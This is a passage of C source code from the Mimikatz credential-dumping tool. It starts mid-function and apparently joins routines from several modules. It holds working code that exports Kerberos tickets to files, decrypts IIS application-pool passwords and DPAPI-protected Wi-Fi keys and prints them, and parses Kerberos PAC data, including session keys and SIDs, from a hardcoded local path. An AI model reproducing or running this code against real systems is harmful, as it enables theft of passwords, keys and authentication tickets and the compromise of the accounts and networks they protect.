kprintf(L"OK\n");
}
else
{
if(saveFilename = kuhl_m_kerberos_ccache_generateFileName(i, ticket, MIMIKATZ_KERBEROS_EXT))
{
if(kull_m_file_writeData(saveFilename, App_KrbCred, App_KrbCred_Size))
kprintf(L"\n\t * Saved to file %s !", saveFilename);
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
LocalFree(saveFilename);
}
}
LocalFree(App_KrbCred);
}
}
}
else kprintf(L"\n\t* %wZ entry? *", &usXCACHECONF);
kuhl_m_kerberos_ticket_freeTicket(ticket);
}
}
kuhl_m_kerberos_ticket_freeExternalName(principalName);
}
}
else PRINT_ERROR(L"ccache version != 0x0504\n");
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"At least one filename is needed\n");
return STATUS_SUCCESS;
}
void kuhl_m_iis_apphost_provider_decrypt(int argc, wchar_t * argv[], PCWSTR keyContainerName, BOOL isMachine, LPCBYTE sessionKey, DWORD szSessionKey, LPCBYTE data, DWORD szData)
{
BOOL isLive;
PBYTE liveData;
DWORD szLiveData, szPvk;
HCRYPTPROV hProv;
HCRYPTKEY hKey = 0, hSessionKey;
PPVK_FILE_HDR pvk = NULL;
PCWSTR pvkName = NULL;
isLive = kull_m_string_args_byName(argc, argv, L"live", NULL, NULL);
if(!kull_m_string_args_byName(argc, argv, keyContainerName, &pvkName, NULL))
kull_m_string_args_byName(argc, argv, L"pvk", &pvkName, NULL);
if(isLive || pvkName)
{
if(liveData = (PBYTE) LocalAlloc(LPTR, szData))
{
RtlCopyMemory(liveData, data, szData);
szLiveData = szData;
if(isLive)
kprintf(L" | Live Key : %s - %s : ", keyContainerName, isMachine ? L"machine" : L"user");
if(CryptAcquireContext(&hProv, isLive ? keyContainerName : NULL, (MIMIKATZ_NT_BUILD_NUMBER <= KULL_M_WIN_BUILD_XP) ? MS_ENH_RSA_AES_PROV_XP : MS_ENH_RSA_AES_PROV , PROV_RSA_AES, (isLive ? 0 : CRYPT_VERIFYCONTEXT) | (isMachine ? CRYPT_MACHINE_KEYSET : 0)))
{
if(isLive)
kprintf(L"OK\n");
else
{
if(kull_m_file_readData(pvkName, (PBYTE *) &pvk, &szPvk))
{
kprintf(L" | PVK file : %s - \'%s\' : ", keyContainerName, pvkName);
if(CryptImportKey(hProv, (PBYTE) pvk + sizeof(PVK_FILE_HDR), pvk->cbPvk, 0, 0, &hKey))
kprintf(L"OK\n");
else PRINT_ERROR_AUTO(L"CryptImportKey (RSA)");
}
}
if(isLive || hKey)
{
if(CryptImportKey(hProv, sessionKey, szSessionKey, hKey, 0, &hSessionKey))
{
if(CryptDecrypt(hSessionKey, 0, FALSE, 0, liveData, &szLiveData))
{
kprintf(L" | Password : %s\n", liveData + sizeof(DWORD) /*CRC32 ? Random ?*/);
}
else PRINT_ERROR_AUTO(L"CryptDecrypt");
CryptDestroyKey(hSessionKey);
}
else PRINT_ERROR_AUTO(L"CryptImportKey (session)");
}
if(!isLive)
{
if(hKey)
CryptDestroyKey(hKey);
if(pvk)
LocalFree(pvk);
}
CryptReleaseContext(hProv, 0);
}
else PRINT_ERROR_AUTO(L"CryptAcquireContext");
LocalFree(liveData);
}
}
}
NTSTATUS kuhl_m_dpapi_wifi(int argc, wchar_t * argv[])
{
PBYTE pFile, hex, dataOut;
DWORD dwData, lenHex, lenDataOut;
LPWSTR dataU, dataSSID, dataF, dataAuth;
LPCWSTR infile;
PKULL_M_DPAPI_BLOB blob;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, &pFile, &dwData))
{
if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile))
{
if(kull_m_string_quickxml_simplefind(dataU, L"name", &dataF))
{
kprintf(L"Profile \'%s\'\n\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"SSID", &dataSSID))
{
kprintf(L" * SSID ");
if(kull_m_string_quickxml_simplefind(dataSSID, L"name", &dataF))
{
kprintf(L"name : %s\n", dataF);
LocalFree(dataF);
}
else if(kull_m_string_quickxml_simplefind(dataSSID, L"hex", &dataF))
{
kprintf(L"hex : %s\n", dataF);
LocalFree(dataF);
}
else kprintf(L"?\n");
LocalFree(dataSSID);
}
if(kull_m_string_quickxml_simplefind(dataU, L"authentication", &dataAuth))
{
kprintf(L" * Authentication: %s\n", dataAuth);
if(kull_m_string_quickxml_simplefind(dataU, L"encryption", &dataF))
{
kprintf(L" * Encryption : %s\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"keyMaterial", &dataF))
{
if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex))
{
if(blob = kull_m_dpapi_blob_create(hex))
{
kprintf(L"\n");
kull_m_dpapi_blob_descr(0, blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL))
{
kprintf(L" * Key Material : ");
if(_wcsicmp(dataAuth, L"WEP") == 0)
{
kprintf(L"(hex) ");
kull_m_string_wprintf_hex(dataOut, lenDataOut, 0);
}
else
kprintf(L"%.*S", lenDataOut, dataOut);
kprintf(L"\n");
LocalFree(dataOut);
}
kull_m_dpapi_blob_delete(blob);
}
LocalFree(hex);
}
LocalFree(dataF);
}
LocalFree(dataAuth);
}
LocalFree(dataU);
}
LocalFree(pFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input Wlan XML profile needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kerberos_pac_info(int argc, wchar_t * argv[])
{
PPACTYPE pacType;
DWORD pacLenght, i, j;
BYTE buffer[16] = {0};
PRPCE_KERB_VALIDATION_INFO pValInfo;
PPAC_SIGNATURE_DATA pSignatureData;
PPAC_CLIENT_INFO pClientInfo;
PGROUP_MEMBERSHIP pGroup;
PRPCE_KERB_EXTRA_SID pExtraSids;
PSID pSid;
PVOID base;
if(kull_m_file_readData(L"C:\\security\\mimikatz\\mimikatz\\bad.pac", (PBYTE *) &pacType, &pacLenght))
{
kprintf(L"version %u, nbBuffer = %u\n\n", pacType->Version, pacType->cBuffers);
for(i = 0; i < pacType->cBuffers; i++)
{
switch(pacType->Buffers[i].ulType)
{
case PACINFO_TYPE_LOGON_INFO:
pValInfo = (PRPCE_KERB_VALIDATION_INFO) ((PBYTE) pacType + pacType->Buffers[i].Offset);
base = (PBYTE) &pValInfo->infos + sizeof(MARSHALL_KERB_VALIDATION_INFO);
kprintf(L"[%02u] %08x @ offset %016llx (%u)\n", i, pacType->Buffers[i].ulType, pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize);
kull_m_string_wprintf_hex((PBYTE) pacType + pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize, 1 | (16 << 16));
kprintf(L"\n");
kprintf(L"*** Validation Informations *** (%u)\n", pacType->Buffers[i].cbBufferSize);
kprintf(L"TypeHeader : version 0x%02x, endianness 0x%02x, length %hu (%u), filer %08x\n", pValInfo->typeHeader.Version, pValInfo->typeHeader.Endianness, pValInfo->typeHeader.CommonHeaderLength, sizeof(MARSHALL_KERB_VALIDATION_INFO), pValInfo->typeHeader.Filler);
kprintf(L"PrivateHeader : length %u, filer %08x\n", pValInfo->privateHeader.ObjectBufferLength, pValInfo->privateHeader.Filler);
kprintf(L"RootElementId : %08x\n\n", pValInfo->RootElementId);
kprintf(L"LogonTime %016llx - ", pValInfo->infos.LogonTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.LogonTime); kprintf(L"\n");
kprintf(L"LogoffTime %016llx - ", pValInfo->infos.LogoffTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.LogoffTime); kprintf(L"\n");
kprintf(L"KickOffTime %016llx - ", pValInfo->infos.KickOffTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.KickOffTime); kprintf(L"\n");
kprintf(L"PasswordLastSet %016llx - ", pValInfo->infos.PasswordLastSet); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordLastSet); kprintf(L"\n");
kprintf(L"PasswordCanChange %016llx - ", pValInfo->infos.PasswordCanChange); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordCanChange); kprintf(L"\n");
kprintf(L"PasswordMustChange %016llx - ", pValInfo->infos.PasswordMustChange); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordMustChange); kprintf(L"\n");
kprintf(L"\n");
kuhl_m_kerberos_pac_ustring(L"EffectiveName ", &pValInfo->infos.EffectiveName, base);
kuhl_m_kerberos_pac_ustring(L"FullName ", &pValInfo->infos.FullName, base);
kuhl_m_kerberos_pac_ustring(L"LogonScript ", &pValInfo->infos.LogonScript, base);
kuhl_m_kerberos_pac_ustring(L"ProfilePath ", &pValInfo->infos.ProfilePath, base);
kuhl_m_kerberos_pac_ustring(L"HomeDirectory ", &pValInfo->infos.HomeDirectory, base);
kuhl_m_kerberos_pac_ustring(L"HomeDirectoryDrive ", &pValInfo->infos.HomeDirectoryDrive, base);
kprintf(L"\n");
kprintf(L"LogonCount %hu\n", pValInfo->infos.LogonCount);
kprintf(L"BadPasswordCount %hu\n", pValInfo->infos.BadPasswordCount);
kprintf(L"\n");
kprintf(L"UserId %08x (%u)\n", pValInfo->infos.UserId, pValInfo->infos.UserId);
kprintf(L"PrimaryGroupId %08x (%u)\n", pValInfo->infos.PrimaryGroupId, pValInfo->infos.PrimaryGroupId);
kprintf(L"\n");
kprintf(L"GroupCount %u\n", pValInfo->infos.GroupCount);
pGroup = (PGROUP_MEMBERSHIP) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.GroupIds, base);
kprintf(L"GroupIds @ %08x\n * RID : ", pValInfo->infos.GroupIds);
for(j = 0; j < pValInfo->infos.GroupCount; j++)
kprintf(L"%u,", pGroup[j].RelativeId); //, pGroup[j].Attributes);
kprintf(L"\n\n");
kprintf(L"UserFlags %08x (%u)\n", pValInfo->infos.UserFlags, pValInfo->infos.UserFlags);
kprintf(L"UserSessionKey "); kull_m_string_wprintf_hex(pValInfo->infos.UserSessionKey.data, 16, 0); kprintf(L"\n");
kprintf(L"\n");
kuhl_m_kerberos_pac_ustring(L"LogonServer ", &pValInfo->infos.LogonServer, base);
kuhl_m_kerberos_pac_ustring(L"LogonDomainName ", &pValInfo->infos.LogonDomainName, base);
kprintf(L"\n");
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.LogonDomainId, base);
kprintf(L"LogonDomainId @ %08x\n * SID : ", pValInfo->infos.LogonDomainId); kull_m_string_displaySID(pSid); kprintf(L"\n");
kprintf(L"\n");
kprintf(L"UserAccountControl %08x (%u)\n", pValInfo->infos.UserAccountControl, pValInfo->infos.UserAccountControl);
kprintf(L"SubAuthStatus %08x (%u)\n", pValInfo->infos.SubAuthStatus, pValInfo->infos.SubAuthStatus);
kprintf(L"\n");
kprintf(L"LastSuccessfulILogon %016llx\n", pValInfo->infos.LastSuccessfulILogon);
kprintf(L"LastFailedILogon %016llx\n", pValInfo->infos.LastFailedILogon);
kprintf(L"\n");
kprintf(L"FailedILogonCount %u\n", pValInfo->infos.FailedILogonCount);
kprintf(L"\n");
kprintf(L"SidCount %u\n", pValInfo->infos.SidCount);
kprintf(L"ExtraSids @ %08x\n", pValInfo->infos.ExtraSids);
pExtraSids = (PRPCE_KERB_EXTRA_SID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ExtraSids, base);
for(j = 0; j < pValInfo->infos.SidCount; j++)
{kull_m_string_wprintf_hex(pExtraSids, 64, 1);
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pExtraSids[j].ExtraSid, base);
kprintf(L"ExtraSid [%u] @ %08x\n * SID : ", j, pExtraSids[j].ExtraSid); kull_m_string_displaySID(pSid); kprintf(L"\n");
}
kprintf(L"\n");
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ResourceGroupDomainSid, base);
kprintf(L"ResourceGroupDomainSid @ %08x\n * SID : ", pValInfo->infos.ResourceGroupDomainSid); if(pSid) kull_m_string_displaySID(pSid); kprintf(L"\n");
kprintf(L"ResourceGroupCount %u\n", pValInfo->infos.ResourceGroupCount);
pGroup = (PGROUP_MEMBERSHIP) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ResourceGroupIds, base);
kprintf(L"ResourceGroupIds @ %08x\n * RID : ", pValInfo->infos.ResourceGroupIds);
for(j = 0; j < pValInfo->infos.ResourceGroupCount; j++)
kprintf(L"%u,", pGroup[j].RelativeId); //, pGroup[j].Attributes);
break;
case PACINFO_TYPE_CHECKSUM_SRV: // Server Signature
case PACINFO_TYPE_CHECKSUM_KDC: // KDC Signature
pSignatureData = (PPAC_SIGNATURE_DATA) ((PBYTE) pacType + pacType->Buffers[i].Offset);
kprintf(L"*** %s Signature ***\n", (pacType->Buffers[i].ulType == 0x00000006) ? L"Server" : L"KDC");
kprintf(L"Type %08x - (%hu) : ", pSignatureData->SignatureType, 0);//pSignatureData->RODCIdentifier);
kull_m_string_wprintf_hex(pSignatureData->Signature, (pSignatureData->SignatureType == KERB_CHECKSUM_HMAC_MD5) ? LM_NTLM_HASH_LENGTH : 12, 0);
kprintf(L"\n");
break;
case PACINFO_TYPE_CNAME_TINFO: // Client name and ticket information
pClientInfo = (PPAC_CLIENT_INFO) ((PBYTE) pacType + pacType->Buffers[i].Offset);
kprintf(L"*** Client name and ticket information ***\n");
kprintf(L"ClientId %016llx - ", pClientInfo->ClientId); kull_m_string_displayLocalFileTime(&pClientInfo->ClientId); kprintf(L"\n");
kprintf(L"Client (%hu, %.*s)\n", pClientInfo->NameLength, pClientInfo->NameLength / sizeof(WCHAR), pClientInfo->Name);
break;
default:
kull_m_string_wprintf_hex(&pacType->Buffers[i], sizeof(PAC_INFO_BUFFER), 1);
kprintf(L"\n");
kprintf(L"[%02u] %08x @ offset %016llx (%u)\n", i, pacType->Buffers[i].ulType, pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize);
kull_m_string_wprintf_hex((PBYTE) pacType + pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize, 1);
kprintf(L"\n");
}
kprintf(L"\n");
}
LocalFree(pacType);
}
return STATUS_SUCCESS;
}
